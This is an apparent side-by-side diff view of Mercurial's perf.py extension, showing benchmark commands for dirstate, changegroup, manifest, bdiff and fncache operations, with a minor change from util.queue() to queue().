612 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
603 ])
613 ])
604 elif isinstance(bundle, streamclone.streamcloneapplier):
614 elif isinstance(bundle, streamclone.streamcloneapplier):
605 raise error.Abort('stream clone bundles not supported')
615 raise error.Abort('stream clone bundles not supported')
606 else:
616 else:
607 raise error.Abort('unhandled bundle type: %s' % type(bundle))
617 raise error.Abort('unhandled bundle type: %s' % type(bundle))
608
618
609 for fn, title in benches:
619 for fn, title in benches:
610 timer, fm = gettimer(ui, opts)
620 timer, fm = gettimer(ui, opts)
611 timer(fn, title=title)
621 timer(fn, title=title)
612 fm.end()
622 fm.end()
613
623
614 @command('perfchangegroupchangelog', formatteropts +
624 @command('perfchangegroupchangelog', formatteropts +
615 [('', 'version', '02', 'changegroup version'),
625 [('', 'version', '02', 'changegroup version'),
616 ('r', 'rev', '', 'revisions to add to changegroup')])
626 ('r', 'rev', '', 'revisions to add to changegroup')])
617 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
627 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
618 """Benchmark producing a changelog group for a changegroup.
628 """Benchmark producing a changelog group for a changegroup.
619
629
620 This measures the time spent processing the changelog during a
630 This measures the time spent processing the changelog during a
621 bundle operation. This occurs during `hg bundle` and on a server
631 bundle operation. This occurs during `hg bundle` and on a server
622 processing a `getbundle` wire protocol request (handles clones
632 processing a `getbundle` wire protocol request (handles clones
623 and pull requests).
633 and pull requests).
624
634
625 By default, all revisions are added to the changegroup.
635 By default, all revisions are added to the changegroup.
626 """
636 """
627 cl = repo.changelog
637 cl = repo.changelog
628 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
638 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
629 bundler = changegroup.getbundler(version, repo)
639 bundler = changegroup.getbundler(version, repo)
630
640
631 def lookup(node):
641 def lookup(node):
632 # The real bundler reads the revision in order to access the
642 # The real bundler reads the revision in order to access the
633 # manifest node and files list. Do that here.
643 # manifest node and files list. Do that here.
634 cl.read(node)
644 cl.read(node)
635 return node
645 return node
636
646
637 def d():
647 def d():
638 for chunk in bundler.group(revs, cl, lookup):
648 for chunk in bundler.group(revs, cl, lookup):
639 pass
649 pass
640
650
641 timer, fm = gettimer(ui, opts)
651 timer, fm = gettimer(ui, opts)
642 timer(d)
652 timer(d)
643 fm.end()
653 fm.end()
644
654
645 @command('perfdirs', formatteropts)
655 @command('perfdirs', formatteropts)
646 def perfdirs(ui, repo, **opts):
656 def perfdirs(ui, repo, **opts):
647 timer, fm = gettimer(ui, opts)
657 timer, fm = gettimer(ui, opts)
648 dirstate = repo.dirstate
658 dirstate = repo.dirstate
649 'a' in dirstate
659 'a' in dirstate
650 def d():
660 def d():
651 dirstate.hasdir('a')
661 dirstate.hasdir('a')
652 del dirstate._map._dirs
662 del dirstate._map._dirs
653 timer(d)
663 timer(d)
654 fm.end()
664 fm.end()
655
665
656 @command('perfdirstate', formatteropts)
666 @command('perfdirstate', formatteropts)
657 def perfdirstate(ui, repo, **opts):
667 def perfdirstate(ui, repo, **opts):
658 timer, fm = gettimer(ui, opts)
668 timer, fm = gettimer(ui, opts)
659 "a" in repo.dirstate
669 "a" in repo.dirstate
660 def d():
670 def d():
661 repo.dirstate.invalidate()
671 repo.dirstate.invalidate()
662 "a" in repo.dirstate
672 "a" in repo.dirstate
663 timer(d)
673 timer(d)
664 fm.end()
674 fm.end()
665
675
666 @command('perfdirstatedirs', formatteropts)
676 @command('perfdirstatedirs', formatteropts)
667 def perfdirstatedirs(ui, repo, **opts):
677 def perfdirstatedirs(ui, repo, **opts):
668 timer, fm = gettimer(ui, opts)
678 timer, fm = gettimer(ui, opts)
669 "a" in repo.dirstate
679 "a" in repo.dirstate
670 def d():
680 def d():
671 repo.dirstate.hasdir("a")
681 repo.dirstate.hasdir("a")
672 del repo.dirstate._map._dirs
682 del repo.dirstate._map._dirs
673 timer(d)
683 timer(d)
674 fm.end()
684 fm.end()
675
685
676 @command('perfdirstatefoldmap', formatteropts)
686 @command('perfdirstatefoldmap', formatteropts)
677 def perfdirstatefoldmap(ui, repo, **opts):
687 def perfdirstatefoldmap(ui, repo, **opts):
678 timer, fm = gettimer(ui, opts)
688 timer, fm = gettimer(ui, opts)
679 dirstate = repo.dirstate
689 dirstate = repo.dirstate
680 'a' in dirstate
690 'a' in dirstate
681 def d():
691 def d():
682 dirstate._map.filefoldmap.get('a')
692 dirstate._map.filefoldmap.get('a')
683 del dirstate._map.filefoldmap
693 del dirstate._map.filefoldmap
684 timer(d)
694 timer(d)
685 fm.end()
695 fm.end()
686
696
687 @command('perfdirfoldmap', formatteropts)
697 @command('perfdirfoldmap', formatteropts)
688 def perfdirfoldmap(ui, repo, **opts):
698 def perfdirfoldmap(ui, repo, **opts):
689 timer, fm = gettimer(ui, opts)
699 timer, fm = gettimer(ui, opts)
690 dirstate = repo.dirstate
700 dirstate = repo.dirstate
691 'a' in dirstate
701 'a' in dirstate
692 def d():
702 def d():
693 dirstate._map.dirfoldmap.get('a')
703 dirstate._map.dirfoldmap.get('a')
694 del dirstate._map.dirfoldmap
704 del dirstate._map.dirfoldmap
695 del dirstate._map._dirs
705 del dirstate._map._dirs
696 timer(d)
706 timer(d)
697 fm.end()
707 fm.end()
698
708
699 @command('perfdirstatewrite', formatteropts)
709 @command('perfdirstatewrite', formatteropts)
700 def perfdirstatewrite(ui, repo, **opts):
710 def perfdirstatewrite(ui, repo, **opts):
701 timer, fm = gettimer(ui, opts)
711 timer, fm = gettimer(ui, opts)
702 ds = repo.dirstate
712 ds = repo.dirstate
703 "a" in ds
713 "a" in ds
704 def d():
714 def d():
705 ds._dirty = True
715 ds._dirty = True
706 ds.write(repo.currenttransaction())
716 ds.write(repo.currenttransaction())
707 timer(d)
717 timer(d)
708 fm.end()
718 fm.end()
709
719
710 @command('perfmergecalculate',
720 @command('perfmergecalculate',
711 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
721 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
712 def perfmergecalculate(ui, repo, rev, **opts):
722 def perfmergecalculate(ui, repo, rev, **opts):
713 timer, fm = gettimer(ui, opts)
723 timer, fm = gettimer(ui, opts)
714 wctx = repo[None]
724 wctx = repo[None]
715 rctx = scmutil.revsingle(repo, rev, rev)
725 rctx = scmutil.revsingle(repo, rev, rev)
716 ancestor = wctx.ancestor(rctx)
726 ancestor = wctx.ancestor(rctx)
717 # we don't want working dir files to be stat'd in the benchmark, so prime
727 # we don't want working dir files to be stat'd in the benchmark, so prime
718 # that cache
728 # that cache
719 wctx.dirty()
729 wctx.dirty()
720 def d():
730 def d():
721 # acceptremote is True because we don't want prompts in the middle of
731 # acceptremote is True because we don't want prompts in the middle of
722 # our benchmark
732 # our benchmark
723 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
733 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
724 acceptremote=True, followcopies=True)
734 acceptremote=True, followcopies=True)
725 timer(d)
735 timer(d)
726 fm.end()
736 fm.end()
727
737
728 @command('perfpathcopies', [], "REV REV")
738 @command('perfpathcopies', [], "REV REV")
729 def perfpathcopies(ui, repo, rev1, rev2, **opts):
739 def perfpathcopies(ui, repo, rev1, rev2, **opts):
730 timer, fm = gettimer(ui, opts)
740 timer, fm = gettimer(ui, opts)
731 ctx1 = scmutil.revsingle(repo, rev1, rev1)
741 ctx1 = scmutil.revsingle(repo, rev1, rev1)
732 ctx2 = scmutil.revsingle(repo, rev2, rev2)
742 ctx2 = scmutil.revsingle(repo, rev2, rev2)
733 def d():
743 def d():
734 copies.pathcopies(ctx1, ctx2)
744 copies.pathcopies(ctx1, ctx2)
735 timer(d)
745 timer(d)
736 fm.end()
746 fm.end()
737
747
738 @command('perfphases',
748 @command('perfphases',
739 [('', 'full', False, 'include file reading time too'),
749 [('', 'full', False, 'include file reading time too'),
740 ], "")
750 ], "")
741 def perfphases(ui, repo, **opts):
751 def perfphases(ui, repo, **opts):
742 """benchmark phasesets computation"""
752 """benchmark phasesets computation"""
743 timer, fm = gettimer(ui, opts)
753 timer, fm = gettimer(ui, opts)
744 _phases = repo._phasecache
754 _phases = repo._phasecache
745 full = opts.get('full')
755 full = opts.get('full')
746 def d():
756 def d():
747 phases = _phases
757 phases = _phases
748 if full:
758 if full:
749 clearfilecache(repo, '_phasecache')
759 clearfilecache(repo, '_phasecache')
750 phases = repo._phasecache
760 phases = repo._phasecache
751 phases.invalidate()
761 phases.invalidate()
752 phases.loadphaserevs(repo)
762 phases.loadphaserevs(repo)
753 timer(d)
763 timer(d)
754 fm.end()
764 fm.end()
755
765
756 @command('perfmanifest', [], 'REV')
766 @command('perfmanifest', [], 'REV')
757 def perfmanifest(ui, repo, rev, **opts):
767 def perfmanifest(ui, repo, rev, **opts):
758 timer, fm = gettimer(ui, opts)
768 timer, fm = gettimer(ui, opts)
759 ctx = scmutil.revsingle(repo, rev, rev)
769 ctx = scmutil.revsingle(repo, rev, rev)
760 t = ctx.manifestnode()
770 t = ctx.manifestnode()
761 def d():
771 def d():
762 repo.manifestlog.clearcaches()
772 repo.manifestlog.clearcaches()
763 repo.manifestlog[t].read()
773 repo.manifestlog[t].read()
764 timer(d)
774 timer(d)
765 fm.end()
775 fm.end()
766
776
767 @command('perfchangeset', formatteropts)
777 @command('perfchangeset', formatteropts)
768 def perfchangeset(ui, repo, rev, **opts):
778 def perfchangeset(ui, repo, rev, **opts):
769 timer, fm = gettimer(ui, opts)
779 timer, fm = gettimer(ui, opts)
770 n = scmutil.revsingle(repo, rev).node()
780 n = scmutil.revsingle(repo, rev).node()
771 def d():
781 def d():
772 repo.changelog.read(n)
782 repo.changelog.read(n)
773 #repo.changelog._cache = None
783 #repo.changelog._cache = None
774 timer(d)
784 timer(d)
775 fm.end()
785 fm.end()
776
786
777 @command('perfindex', formatteropts)
787 @command('perfindex', formatteropts)
778 def perfindex(ui, repo, **opts):
788 def perfindex(ui, repo, **opts):
779 import mercurial.revlog
789 import mercurial.revlog
780 timer, fm = gettimer(ui, opts)
790 timer, fm = gettimer(ui, opts)
781 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
791 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
782 n = repo["tip"].node()
792 n = repo["tip"].node()
783 svfs = getsvfs(repo)
793 svfs = getsvfs(repo)
784 def d():
794 def d():
785 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
795 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
786 cl.rev(n)
796 cl.rev(n)
787 timer(d)
797 timer(d)
788 fm.end()
798 fm.end()
789
799
790 @command('perfstartup', formatteropts)
800 @command('perfstartup', formatteropts)
791 def perfstartup(ui, repo, **opts):
801 def perfstartup(ui, repo, **opts):
792 timer, fm = gettimer(ui, opts)
802 timer, fm = gettimer(ui, opts)
793 cmd = sys.argv[0]
803 cmd = sys.argv[0]
794 def d():
804 def d():
795 if os.name != 'nt':
805 if os.name != 'nt':
796 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
806 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
797 else:
807 else:
798 os.environ['HGRCPATH'] = ' '
808 os.environ['HGRCPATH'] = ' '
799 os.system("%s version -q > NUL" % cmd)
809 os.system("%s version -q > NUL" % cmd)
800 timer(d)
810 timer(d)
801 fm.end()
811 fm.end()
802
812
803 @command('perfparents', formatteropts)
813 @command('perfparents', formatteropts)
804 def perfparents(ui, repo, **opts):
814 def perfparents(ui, repo, **opts):
805 timer, fm = gettimer(ui, opts)
815 timer, fm = gettimer(ui, opts)
806 # control the number of commits perfparents iterates over
816 # control the number of commits perfparents iterates over
807 # experimental config: perf.parentscount
817 # experimental config: perf.parentscount
808 count = getint(ui, "perf", "parentscount", 1000)
818 count = getint(ui, "perf", "parentscount", 1000)
809 if len(repo.changelog) < count:
819 if len(repo.changelog) < count:
810 raise error.Abort("repo needs %d commits for this test" % count)
820 raise error.Abort("repo needs %d commits for this test" % count)
811 repo = repo.unfiltered()
821 repo = repo.unfiltered()
812 nl = [repo.changelog.node(i) for i in xrange(count)]
822 nl = [repo.changelog.node(i) for i in xrange(count)]
813 def d():
823 def d():
814 for n in nl:
824 for n in nl:
815 repo.changelog.parents(n)
825 repo.changelog.parents(n)
816 timer(d)
826 timer(d)
817 fm.end()
827 fm.end()
818
828
819 @command('perfctxfiles', formatteropts)
829 @command('perfctxfiles', formatteropts)
820 def perfctxfiles(ui, repo, x, **opts):
830 def perfctxfiles(ui, repo, x, **opts):
821 x = int(x)
831 x = int(x)
822 timer, fm = gettimer(ui, opts)
832 timer, fm = gettimer(ui, opts)
823 def d():
833 def d():
824 len(repo[x].files())
834 len(repo[x].files())
825 timer(d)
835 timer(d)
826 fm.end()
836 fm.end()
827
837
828 @command('perfrawfiles', formatteropts)
838 @command('perfrawfiles', formatteropts)
829 def perfrawfiles(ui, repo, x, **opts):
839 def perfrawfiles(ui, repo, x, **opts):
830 x = int(x)
840 x = int(x)
831 timer, fm = gettimer(ui, opts)
841 timer, fm = gettimer(ui, opts)
832 cl = repo.changelog
842 cl = repo.changelog
833 def d():
843 def d():
834 len(cl.read(x)[3])
844 len(cl.read(x)[3])
835 timer(d)
845 timer(d)
836 fm.end()
846 fm.end()
837
847
838 @command('perflookup', formatteropts)
848 @command('perflookup', formatteropts)
839 def perflookup(ui, repo, rev, **opts):
849 def perflookup(ui, repo, rev, **opts):
840 timer, fm = gettimer(ui, opts)
850 timer, fm = gettimer(ui, opts)
841 timer(lambda: len(repo.lookup(rev)))
851 timer(lambda: len(repo.lookup(rev)))
842 fm.end()
852 fm.end()
843
853
844 @command('perfrevrange', formatteropts)
854 @command('perfrevrange', formatteropts)
845 def perfrevrange(ui, repo, *specs, **opts):
855 def perfrevrange(ui, repo, *specs, **opts):
846 timer, fm = gettimer(ui, opts)
856 timer, fm = gettimer(ui, opts)
847 revrange = scmutil.revrange
857 revrange = scmutil.revrange
848 timer(lambda: len(revrange(repo, specs)))
858 timer(lambda: len(revrange(repo, specs)))
849 fm.end()
859 fm.end()
850
860
851 @command('perfnodelookup', formatteropts)
861 @command('perfnodelookup', formatteropts)
852 def perfnodelookup(ui, repo, rev, **opts):
862 def perfnodelookup(ui, repo, rev, **opts):
853 timer, fm = gettimer(ui, opts)
863 timer, fm = gettimer(ui, opts)
854 import mercurial.revlog
864 import mercurial.revlog
855 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
865 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
856 n = scmutil.revsingle(repo, rev).node()
866 n = scmutil.revsingle(repo, rev).node()
857 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
867 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
858 def d():
868 def d():
859 cl.rev(n)
869 cl.rev(n)
860 clearcaches(cl)
870 clearcaches(cl)
861 timer(d)
871 timer(d)
862 fm.end()
872 fm.end()
863
873
864 @command('perflog',
874 @command('perflog',
865 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
875 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
866 def perflog(ui, repo, rev=None, **opts):
876 def perflog(ui, repo, rev=None, **opts):
867 if rev is None:
877 if rev is None:
868 rev=[]
878 rev=[]
869 timer, fm = gettimer(ui, opts)
879 timer, fm = gettimer(ui, opts)
870 ui.pushbuffer()
880 ui.pushbuffer()
871 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
881 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
872 copies=opts.get('rename')))
882 copies=opts.get('rename')))
873 ui.popbuffer()
883 ui.popbuffer()
874 fm.end()
884 fm.end()
875
885
876 @command('perfmoonwalk', formatteropts)
886 @command('perfmoonwalk', formatteropts)
877 def perfmoonwalk(ui, repo, **opts):
887 def perfmoonwalk(ui, repo, **opts):
878 """benchmark walking the changelog backwards
888 """benchmark walking the changelog backwards
879
889
880 This also loads the changelog data for each revision in the changelog.
890 This also loads the changelog data for each revision in the changelog.
881 """
891 """
882 timer, fm = gettimer(ui, opts)
892 timer, fm = gettimer(ui, opts)
883 def moonwalk():
893 def moonwalk():
884 for i in xrange(len(repo), -1, -1):
894 for i in xrange(len(repo), -1, -1):
885 ctx = repo[i]
895 ctx = repo[i]
886 ctx.branch() # read changelog data (in addition to the index)
896 ctx.branch() # read changelog data (in addition to the index)
887 timer(moonwalk)
897 timer(moonwalk)
888 fm.end()
898 fm.end()
889
899
890 @command('perftemplating', formatteropts)
900 @command('perftemplating', formatteropts)
891 def perftemplating(ui, repo, rev=None, **opts):
901 def perftemplating(ui, repo, rev=None, **opts):
892 if rev is None:
902 if rev is None:
893 rev=[]
903 rev=[]
894 timer, fm = gettimer(ui, opts)
904 timer, fm = gettimer(ui, opts)
895 ui.pushbuffer()
905 ui.pushbuffer()
896 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
906 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
897 template='{date|shortdate} [{rev}:{node|short}]'
907 template='{date|shortdate} [{rev}:{node|short}]'
898 ' {author|person}: {desc|firstline}\n'))
908 ' {author|person}: {desc|firstline}\n'))
899 ui.popbuffer()
909 ui.popbuffer()
900 fm.end()
910 fm.end()
901
911
902 @command('perfcca', formatteropts)
912 @command('perfcca', formatteropts)
903 def perfcca(ui, repo, **opts):
913 def perfcca(ui, repo, **opts):
904 timer, fm = gettimer(ui, opts)
914 timer, fm = gettimer(ui, opts)
905 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
915 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
906 fm.end()
916 fm.end()
907
917
908 @command('perffncacheload', formatteropts)
918 @command('perffncacheload', formatteropts)
909 def perffncacheload(ui, repo, **opts):
919 def perffncacheload(ui, repo, **opts):
910 timer, fm = gettimer(ui, opts)
920 timer, fm = gettimer(ui, opts)
911 s = repo.store
921 s = repo.store
912 def d():
922 def d():
913 s.fncache._load()
923 s.fncache._load()
914 timer(d)
924 timer(d)
915 fm.end()
925 fm.end()
916
926
917 @command('perffncachewrite', formatteropts)
927 @command('perffncachewrite', formatteropts)
918 def perffncachewrite(ui, repo, **opts):
928 def perffncachewrite(ui, repo, **opts):
919 timer, fm = gettimer(ui, opts)
929 timer, fm = gettimer(ui, opts)
920 s = repo.store
930 s = repo.store
921 s.fncache._load()
931 s.fncache._load()
922 lock = repo.lock()
932 lock = repo.lock()
923 tr = repo.transaction('perffncachewrite')
933 tr = repo.transaction('perffncachewrite')
924 def d():
934 def d():
925 s.fncache._dirty = True
935 s.fncache._dirty = True
926 s.fncache.write(tr)
936 s.fncache.write(tr)
927 timer(d)
937 timer(d)
928 tr.close()
938 tr.close()
929 lock.release()
939 lock.release()
930 fm.end()
940 fm.end()
931
941
932 @command('perffncacheencode', formatteropts)
942 @command('perffncacheencode', formatteropts)
933 def perffncacheencode(ui, repo, **opts):
943 def perffncacheencode(ui, repo, **opts):
934 timer, fm = gettimer(ui, opts)
944 timer, fm = gettimer(ui, opts)
935 s = repo.store
945 s = repo.store
936 s.fncache._load()
946 s.fncache._load()
937 def d():
947 def d():
938 for p in s.fncache.entries:
948 for p in s.fncache.entries:
939 s.encode(p)
949 s.encode(p)
940 timer(d)
950 timer(d)
941 fm.end()
951 fm.end()
942
952
943 def _bdiffworker(q, blocks, xdiff, ready, done):
953 def _bdiffworker(q, blocks, xdiff, ready, done):
944 while not done.is_set():
954 while not done.is_set():
945 pair = q.get()
955 pair = q.get()
946 while pair is not None:
956 while pair is not None:
947 if xdiff:
957 if xdiff:
948 mdiff.bdiff.xdiffblocks(*pair)
958 mdiff.bdiff.xdiffblocks(*pair)
949 elif blocks:
959 elif blocks:
950 mdiff.bdiff.blocks(*pair)
960 mdiff.bdiff.blocks(*pair)
951 else:
961 else:
952 mdiff.textdiff(*pair)
962 mdiff.textdiff(*pair)
953 q.task_done()
963 q.task_done()
954 pair = q.get()
964 pair = q.get()
955 q.task_done() # for the None one
965 q.task_done() # for the None one
956 with ready:
966 with ready:
957 ready.wait()
967 ready.wait()
958
968
959 @command('perfbdiff', revlogopts + formatteropts + [
969 @command('perfbdiff', revlogopts + formatteropts + [
960 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
970 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
961 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
971 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
962 ('', 'threads', 0, 'number of thread to use (disable with 0)'),
972 ('', 'threads', 0, 'number of thread to use (disable with 0)'),
963 ('', 'blocks', False, 'test computing diffs into blocks'),
973 ('', 'blocks', False, 'test computing diffs into blocks'),
964 ('', 'xdiff', False, 'use xdiff algorithm'),
974 ('', 'xdiff', False, 'use xdiff algorithm'),
965 ],
975 ],
966
976
967 '-c|-m|FILE REV')
977 '-c|-m|FILE REV')
968 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
978 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
969 """benchmark a bdiff between revisions
979 """benchmark a bdiff between revisions
970
980
971 By default, benchmark a bdiff between its delta parent and itself.
981 By default, benchmark a bdiff between its delta parent and itself.
972
982
973 With ``--count``, benchmark bdiffs between delta parents and self for N
983 With ``--count``, benchmark bdiffs between delta parents and self for N
974 revisions starting at the specified revision.
984 revisions starting at the specified revision.
975
985
976 With ``--alldata``, assume the requested revision is a changeset and
986 With ``--alldata``, assume the requested revision is a changeset and
977 measure bdiffs for all changes related to that changeset (manifest
987 measure bdiffs for all changes related to that changeset (manifest
978 and filelogs).
988 and filelogs).
979 """
989 """
980 opts = pycompat.byteskwargs(opts)
990 opts = pycompat.byteskwargs(opts)
981
991
982 if opts['xdiff'] and not opts['blocks']:
992 if opts['xdiff'] and not opts['blocks']:
983 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
993 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
984
994
985 if opts['alldata']:
995 if opts['alldata']:
986 opts['changelog'] = True
996 opts['changelog'] = True
987
997
988 if opts.get('changelog') or opts.get('manifest'):
998 if opts.get('changelog') or opts.get('manifest'):
989 file_, rev = None, file_
999 file_, rev = None, file_
990 elif rev is None:
1000 elif rev is None:
991 raise error.CommandError('perfbdiff', 'invalid arguments')
1001 raise error.CommandError('perfbdiff', 'invalid arguments')
992
1002
993 blocks = opts['blocks']
1003 blocks = opts['blocks']
994 xdiff = opts['xdiff']
1004 xdiff = opts['xdiff']
995 textpairs = []
1005 textpairs = []
996
1006
997 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
1007 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
998
1008
999 startrev = r.rev(r.lookup(rev))
1009 startrev = r.rev(r.lookup(rev))
1000 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1010 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1001 if opts['alldata']:
1011 if opts['alldata']:
1002 # Load revisions associated with changeset.
1012 # Load revisions associated with changeset.
1003 ctx = repo[rev]
1013 ctx = repo[rev]
1004 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1014 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1005 for pctx in ctx.parents():
1015 for pctx in ctx.parents():
1006 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1016 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1007 textpairs.append((pman, mtext))
1017 textpairs.append((pman, mtext))
1008
1018
1009 # Load filelog revisions by iterating manifest delta.
1019 # Load filelog revisions by iterating manifest delta.
1010 man = ctx.manifest()
1020 man = ctx.manifest()
1011 pman = ctx.p1().manifest()
1021 pman = ctx.p1().manifest()
1012 for filename, change in pman.diff(man).items():
1022 for filename, change in pman.diff(man).items():
1013 fctx = repo.file(filename)
1023 fctx = repo.file(filename)
1014 f1 = fctx.revision(change[0][0] or -1)
1024 f1 = fctx.revision(change[0][0] or -1)
1015 f2 = fctx.revision(change[1][0] or -1)
1025 f2 = fctx.revision(change[1][0] or -1)
1016 textpairs.append((f1, f2))
1026 textpairs.append((f1, f2))
1017 else:
1027 else:
1018 dp = r.deltaparent(rev)
1028 dp = r.deltaparent(rev)
1019 textpairs.append((r.revision(dp), r.revision(rev)))
1029 textpairs.append((r.revision(dp), r.revision(rev)))
1020
1030
1021 withthreads = threads > 0
1031 withthreads = threads > 0
1022 if not withthreads:
1032 if not withthreads:
1023 def d():
1033 def d():
1024 for pair in textpairs:
1034 for pair in textpairs:
1025 if xdiff:
1035 if xdiff:
1026 mdiff.bdiff.xdiffblocks(*pair)
1036 mdiff.bdiff.xdiffblocks(*pair)
1027 elif blocks:
1037 elif blocks:
1028 mdiff.bdiff.blocks(*pair)
1038 mdiff.bdiff.blocks(*pair)
1029 else:
1039 else:
1030 mdiff.textdiff(*pair)
1040 mdiff.textdiff(*pair)
1031 else:
1041 else:
1032 q = util.queue()
1042 q = queue()
1033 for i in xrange(threads):
1043 for i in xrange(threads):
1034 q.put(None)
1044 q.put(None)
1035 ready = threading.Condition()
1045 ready = threading.Condition()
1036 done = threading.Event()
1046 done = threading.Event()
1037 for i in xrange(threads):
1047 for i in xrange(threads):
1038 threading.Thread(target=_bdiffworker,
1048 threading.Thread(target=_bdiffworker,
1039 args=(q, blocks, xdiff, ready, done)).start()
1049 args=(q, blocks, xdiff, ready, done)).start()
1040 q.join()
1050 q.join()
1041 def d():
1051 def d():
1042 for pair in textpairs:
1052 for pair in textpairs:
1043 q.put(pair)
1053 q.put(pair)
1044 for i in xrange(threads):
1054 for i in xrange(threads):
1045 q.put(None)
1055 q.put(None)
1046 with ready:
1056 with ready:
1047 ready.notify_all()
1057 ready.notify_all()
1048 q.join()
1058 q.join()
1049 timer, fm = gettimer(ui, opts)
1059 timer, fm = gettimer(ui, opts)
1050 timer(d)
1060 timer(d)
1051 fm.end()
1061 fm.end()
1052
1062
1053 if withthreads:
1063 if withthreads:
1054 done.set()
1064 done.set()
1055 for i in xrange(threads):
1065 for i in xrange(threads):
1056 q.put(None)
1066 q.put(None)
1057 with ready:
1067 with ready:
1058 ready.notify_all()
1068 ready.notify_all()
1059
1069
1060 @command('perfunidiff', revlogopts + formatteropts + [
1070 @command('perfunidiff', revlogopts + formatteropts + [
1061 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
1071 ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
1062 ('', 'alldata', False, 'test unidiffs for all associated revisions'),
1072 ('', 'alldata', False, 'test unidiffs for all associated revisions'),
1063 ], '-c|-m|FILE REV')
1073 ], '-c|-m|FILE REV')
1064 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1074 def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
1065 """benchmark a unified diff between revisions
1075 """benchmark a unified diff between revisions
1066
1076
1067 This doesn't include any copy tracing - it's just a unified diff
1077 This doesn't include any copy tracing - it's just a unified diff
1068 of the texts.
1078 of the texts.
1069
1079
1070 By default, benchmark a diff between its delta parent and itself.
1080 By default, benchmark a diff between its delta parent and itself.
1071
1081
1072 With ``--count``, benchmark diffs between delta parents and self for N
1082 With ``--count``, benchmark diffs between delta parents and self for N
1073 revisions starting at the specified revision.
1083 revisions starting at the specified revision.
1074
1084
1075 With ``--alldata``, assume the requested revision is a changeset and
1085 With ``--alldata``, assume the requested revision is a changeset and
1076 measure diffs for all changes related to that changeset (manifest
1086 measure diffs for all changes related to that changeset (manifest
1077 and filelogs).
1087 and filelogs).
1078 """
1088 """
1079 if opts['alldata']:
1089 if opts['alldata']:
1080 opts['changelog'] = True
1090 opts['changelog'] = True
1081
1091
1082 if opts.get('changelog') or opts.get('manifest'):
1092 if opts.get('changelog') or opts.get('manifest'):
1083 file_, rev = None, file_
1093 file_, rev = None, file_
1084 elif rev is None:
1094 elif rev is None:
1085 raise error.CommandError('perfunidiff', 'invalid arguments')
1095 raise error.CommandError('perfunidiff', 'invalid arguments')
1086
1096
1087 textpairs = []
1097 textpairs = []
1088
1098
1089 r = cmdutil.openrevlog(repo, 'perfunidiff', file_, opts)
1099 r = cmdutil.openrevlog(repo, 'perfunidiff', file_, opts)
1090
1100
1091 startrev = r.rev(r.lookup(rev))
1101 startrev = r.rev(r.lookup(rev))
1092 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1102 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1093 if opts['alldata']:
1103 if opts['alldata']:
1094 # Load revisions associated with changeset.
1104 # Load revisions associated with changeset.
1095 ctx = repo[rev]
1105 ctx = repo[rev]
1096 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1106 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1097 for pctx in ctx.parents():
1107 for pctx in ctx.parents():
1098 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1108 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1099 textpairs.append((pman, mtext))
1109 textpairs.append((pman, mtext))
1100
1110
1101 # Load filelog revisions by iterating manifest delta.
1111 # Load filelog revisions by iterating manifest delta.
1102 man = ctx.manifest()
1112 man = ctx.manifest()
1103 pman = ctx.p1().manifest()
1113 pman = ctx.p1().manifest()
1104 for filename, change in pman.diff(man).items():
1114 for filename, change in pman.diff(man).items():
1105 fctx = repo.file(filename)
1115 fctx = repo.file(filename)
1106 f1 = fctx.revision(change[0][0] or -1)
1116 f1 = fctx.revision(change[0][0] or -1)
1107 f2 = fctx.revision(change[1][0] or -1)
1117 f2 = fctx.revision(change[1][0] or -1)
1108 textpairs.append((f1, f2))
1118 textpairs.append((f1, f2))
1109 else:
1119 else:
1110 dp = r.deltaparent(rev)
1120 dp = r.deltaparent(rev)
